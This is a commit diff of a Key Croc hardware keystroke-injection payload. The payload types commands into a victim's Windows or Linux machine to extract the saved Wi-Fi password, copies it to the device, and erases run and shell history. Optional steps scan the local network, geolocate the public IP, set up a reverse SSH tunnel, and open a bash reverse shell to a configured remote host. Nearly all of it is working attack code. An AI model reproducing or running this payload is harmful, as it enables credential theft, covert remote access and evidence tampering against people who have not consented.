Update Croc_getonline.txt
minor changes new options recon, ssh keycroc MATCH command perform specific taskspull/62/head
parent
691ec577f4
commit
ec819336d7
|
@ -1,118 +1,364 @@
|
||||||
# Title: Croc_Getonline
|
# Title: Croc_Getonline
|
||||||
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
||||||
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
|
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
||||||
# Author: spywill
|
# Author: spywill
|
||||||
# Version: 3.5
|
# Version: 4.1
|
||||||
# Category: Key Croc
|
# Category: Key Croc
|
||||||
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
||||||
|
|
||||||
MATCH (getonline_W|getonline_R|getonline_L)
|
# getonline_W <-- MATCH word for windows, Attempt connection to access point
|
||||||
|
# getonline_L <-- MATCH word for Linux, Attempt connection to access point
|
||||||
|
# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
|
||||||
|
# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
|
||||||
|
# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
|
||||||
|
# getonline_K <-- MATCH word for killing keycroc wlan0 interface
|
||||||
|
# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
|
||||||
|
# getonline_H <-- MATCH word for entering ATTACKMODE HID
|
||||||
|
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
|
||||||
|
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
|
||||||
|
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
||||||
|
|
||||||
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
|
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
||||||
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
|
QUACK LOCK
|
||||||
|
|
||||||
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
|
#---> Edit payload option below
|
||||||
|
option=0
|
||||||
|
keycroc_password=hak5croc
|
||||||
|
wifi_pass=/tools/wifipass.txt
|
||||||
|
|
||||||
if [ -f $wifi_pass ]; then
|
#---> Edit remote host below
|
||||||
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
|
remote_user_name=EDIT_REMOTE_USERNAME_HERE
|
||||||
rm -f $wifi_pass
|
remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
|
||||||
|
remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
|
||||||
|
port=7000
|
||||||
|
|
||||||
|
#---> Edit known SSID and password below
|
||||||
|
known_ssid=EDIT_KNOWN_SSID_HERE
|
||||||
|
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
|
||||||
|
|
||||||
|
#---> Edit recon scan on/off below
|
||||||
|
recon=off
|
||||||
|
recon_loot=/root/udisk/tools/Target_SSID.txt
|
||||||
|
|
||||||
|
#---> Edit Linux target password below
|
||||||
|
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
||||||
|
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
||||||
|
else
|
||||||
|
target_password=ENTER_LINUX_PASSWORD_HERE
|
||||||
fi
|
fi
|
||||||
|
|
||||||
ATTACKMODE HID STORAGE
|
recon_scan() {
|
||||||
Q DELAY 5000
|
if [ "$recon" = "on" ]; then
|
||||||
LED ATTACK
|
if [ "$LOOT" = "getonline_W" ]; then
|
||||||
|
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||||
|
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
elif [ "$recon" = "off" ]; then
|
||||||
|
:
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
ENTER_STORAGE() {
|
||||||
|
if [ -f ~/udisk$wifi_pass ]; then
|
||||||
|
cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
|
||||||
|
rm -f ~/udisk$wifi_pass
|
||||||
|
fi
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
QUACK DELAY 5000
|
||||||
|
LED ATTACK
|
||||||
|
}
|
||||||
|
|
||||||
|
RESET_PAYLOAD() {
|
||||||
|
QUACK UNLOCK
|
||||||
|
sleep 5 ; LED OFF
|
||||||
|
killall -9 bash
|
||||||
|
killall -9 python
|
||||||
|
sleep 1
|
||||||
|
RELOAD_PAYLOADS
|
||||||
|
}
|
||||||
|
|
||||||
|
CLEAN_UP() {
|
||||||
|
if [ "$LOOT" = "getonline_W" ]; then
|
||||||
|
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||||
|
QUACK STRING "history -c ; rm -f ~/.bash_history"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
case $LOOT in
|
case $LOOT in
|
||||||
getonline_W)
|
getonline_W)
|
||||||
Q GUI r
|
ENTER_STORAGE
|
||||||
Q DELAY 3000
|
QUACK GUI r
|
||||||
Q STRING "powershell -NoP -NonI -W Hidden"
|
QUACK DELAY 3000
|
||||||
Q ENTER
|
QUACK STRING "powershell -NoP -NonI -W Hidden"
|
||||||
Q DELAY 5000
|
QUACK ENTER
|
||||||
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
|
QUACK DELAY 5000
|
||||||
Q ENTER
|
QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
|
||||||
Q DELAY 3000
|
QUACK ENTER
|
||||||
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
|
QUACK DELAY 3000
|
||||||
Q ENTER
|
QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
|
||||||
Q DELAY 5000
|
QUACK ENTER
|
||||||
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
|
QUACK DELAY 5000
|
||||||
Q ENTER
|
recon_scan
|
||||||
|
CLEAN_UP
|
||||||
|
QUACK STRING "exit"
|
||||||
|
QUACK ENTER
|
||||||
|
ATTACKMODE HID
|
||||||
;;
|
;;
|
||||||
getonline_R)
|
getonline_R)
|
||||||
Q CONTROL-ALT-d
|
ENTER_STORAGE
|
||||||
Q CONTROL-ALT-t
|
QUACK CONTROL-ALT-d
|
||||||
Q DELAY 2000
|
QUACK CONTROL-ALT-t
|
||||||
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
|
||||||
Q DELAY 3000
|
QUACK ENTER
|
||||||
Q STRING "umount \$MOUNT_POINT ; exit"
|
QUACK DELAY 3000
|
||||||
Q ENTER
|
recon_scan
|
||||||
|
CLEAN_UP
|
||||||
|
QUACK STRING "umount \$MOUNT_POINT ; exit"
|
||||||
|
QUACK ENTER
|
||||||
|
ATTACKMODE HID
|
||||||
;;
|
;;
|
||||||
getonline_L)
|
getonline_L)
|
||||||
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
ENTER_STORAGE
|
||||||
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
QUACK CONTROL-ALT-d
|
||||||
|
QUACK ALT-t
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "$target_password"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 3000
|
||||||
|
recon_scan
|
||||||
|
CLEAN_UP
|
||||||
|
QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
|
||||||
|
QUACK ENTER
|
||||||
|
ATTACKMODE HID
|
||||||
|
;;
|
||||||
|
getonline_N)
|
||||||
|
LED B
|
||||||
|
sleep 2
|
||||||
|
echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
|
||||||
|
;;
|
||||||
|
getonline_F)
|
||||||
|
if [ -f ~/udisk$wifi_pass ]; then
|
||||||
|
LED B
|
||||||
|
sleep 2
|
||||||
else
|
else
|
||||||
PC_PW=LINUX
|
LED R
|
||||||
|
RESET_PAYLOAD
|
||||||
fi
|
fi
|
||||||
Q CONTROL-ALT-d
|
;;
|
||||||
Q ALT-t
|
getonline_K)
|
||||||
Q DELAY 2000
|
ifconfig wlan0 down
|
||||||
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
|
LED R
|
||||||
Q ENTER
|
RESET_PAYLOAD
|
||||||
Q DELAY 2000
|
;;
|
||||||
Q STRING "$PC_PW"
|
getonline_S)
|
||||||
Q ENTER
|
ATTACKMODE HID STORAGE
|
||||||
Q DELAY 2000
|
RESET_PAYLOAD
|
||||||
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
;;
|
||||||
Q ENTER
|
getonline_H)
|
||||||
Q DELAY 2000
|
ATTACKMODE HID
|
||||||
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
|
RESET_PAYLOAD
|
||||||
Q ENTER
|
;;
|
||||||
Q DELAY 2000
|
getonline_P)
|
||||||
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
|
ATTACKMODE HID SERIAL
|
||||||
Q ENTER
|
RESET_PAYLOAD
|
||||||
Q DELAY 3000
|
;;
|
||||||
Q STRING "sudo umount \$MOUNT_POINT ; exit"
|
getonline_A)
|
||||||
Q ENTER
|
ATTACKMODE HID AUTO_ETHERNET
|
||||||
|
RESET_PAYLOAD
|
||||||
|
;;
|
||||||
|
getonline_X)
|
||||||
|
LED R
|
||||||
|
rm -f /root/udisk/payloads/Croc_getonline.txt
|
||||||
|
rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt
|
||||||
|
rm -f $recon_loot root/udisk/config.txt
|
||||||
|
apt -y remove sshpass
|
||||||
|
reboot --force
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
|
|
||||||
ATTACKMODE HID
|
|
||||||
sleep 3
|
sleep 3
|
||||||
|
|
||||||
LED SETUP
|
word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
|
||||||
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
|
if [[ $word_count -eq 2 ]]; then
|
||||||
|
ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
|
||||||
|
matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
|
||||||
|
sleep 1
|
||||||
|
if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
|
||||||
|
LED SETUP
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
RESET_PAYLOAD
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
RESET_PAYLOAD
|
||||||
|
fi
|
||||||
|
|
||||||
|
kill -9 $(pidof wpa_supplicant)
|
||||||
|
kill -9 $(pidof dhclient)
|
||||||
ifconfig wlan0 down
|
ifconfig wlan0 down
|
||||||
|
|
||||||
if [ "$LOOT" = "getonline_W" ]; then
|
if [ "$LOOT" = "getonline_W" ]; then
|
||||||
sed -i '0,/./s/^.//' $wifi_pass
|
sed -i '0,/./s/^.//' ~/udisk$wifi_pass
|
||||||
sed -i 's/\r//g' $wifi_pass
|
sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
|
||||||
|
sed -i 's/\r//g' ~/udisk$wifi_pass
|
||||||
fi
|
fi
|
||||||
|
|
||||||
sed -i 's/\( \)*/\1/g' $wifi_pass
|
sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
|
||||||
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
|
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
|
||||||
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
|
sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
|
||||||
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
|
wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
|
||||||
|
|
||||||
ifconfig wlan0 up
|
ifconfig wlan0 up
|
||||||
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
|
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
|
||||||
|
dhclient wlan0
|
||||||
sleep 3
|
sleep 3
|
||||||
systemctl restart ssh.service
|
systemctl restart ssh.service
|
||||||
|
|
||||||
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
|
if : >/dev/tcp/8.8.8.8/53; then
|
||||||
|
if [ $option -eq 0 ]; then
|
||||||
|
:
|
||||||
|
elif [ $option -eq 1 ]; then
|
||||||
|
case "$LOOT" in
|
||||||
|
getonline_W)
|
||||||
|
QUACK GUI m
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "powershell"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 5000
|
||||||
|
;;
|
||||||
|
getonline_R)
|
||||||
|
QUACK CONTROL-ALT-d
|
||||||
|
QUACK CONTROL-ALT-t
|
||||||
|
QUACK DELAY 2000
|
||||||
|
;;
|
||||||
|
getonline_L)
|
||||||
|
QUACK CONTROL-ALT-d
|
||||||
|
QUACK ALT-t
|
||||||
|
QUACK DELAY 2000
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "$keycroc_password"
|
||||||
|
QUACK ENTER
|
||||||
|
elif [ $option -eq 2 ]; then
|
||||||
|
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
||||||
|
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
|
||||||
|
apt -y install sshpass
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
sleep 1
|
||||||
|
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||||
|
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
|
||||||
|
rm -rf ~/.ssh 2>/dev/null
|
||||||
|
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
||||||
|
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
|
||||||
|
sleep 1
|
||||||
|
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
sleep 1
|
||||||
|
fi
|
||||||
|
elif [ $option -eq 3 ]; then
|
||||||
|
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||||
|
/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
sleep 1
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
LED FINISH
|
||||||
|
fi
|
||||||
|
LED FINISH
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
fi
|
||||||
|
|
||||||
sleep 3
|
sleep 3
|
||||||
LED OFF
|
LED OFF
|
||||||
|
QUACK UNLOCK
|
||||||
|
|
||||||
|
if [ "$recon" = "on" ]; then
|
||||||
|
LED C SLOW
|
||||||
|
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
|
||||||
|
ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
|
||||||
|
iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
|
||||||
|
echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
|
||||||
|
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
|
||||||
|
cat /etc/resolv.conf | grep nameserver >> $recon_loot
|
||||||
|
|
||||||
|
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
||||||
|
calculate_network_range() {
|
||||||
|
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
||||||
|
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
||||||
|
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
|
||||||
|
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
|
||||||
|
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
|
||||||
|
echo "$network_range"
|
||||||
|
}
|
||||||
|
perform_nmap_scan() {
|
||||||
|
local network_range=$1
|
||||||
|
nmap -T4 -F $network_range >> $recon_loot
|
||||||
|
}
|
||||||
|
network_range=$(calculate_network_range)
|
||||||
|
perform_nmap_scan $network_range
|
||||||
|
|
||||||
|
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
|
||||||
|
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
|
||||||
|
echo -ne "\n\n" >> $recon_loot
|
||||||
|
LED OFF
|
||||||
|
elif [ "$recon" = "off" ]; then
|
||||||
|
:
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
|
Loading…
Reference in New Issue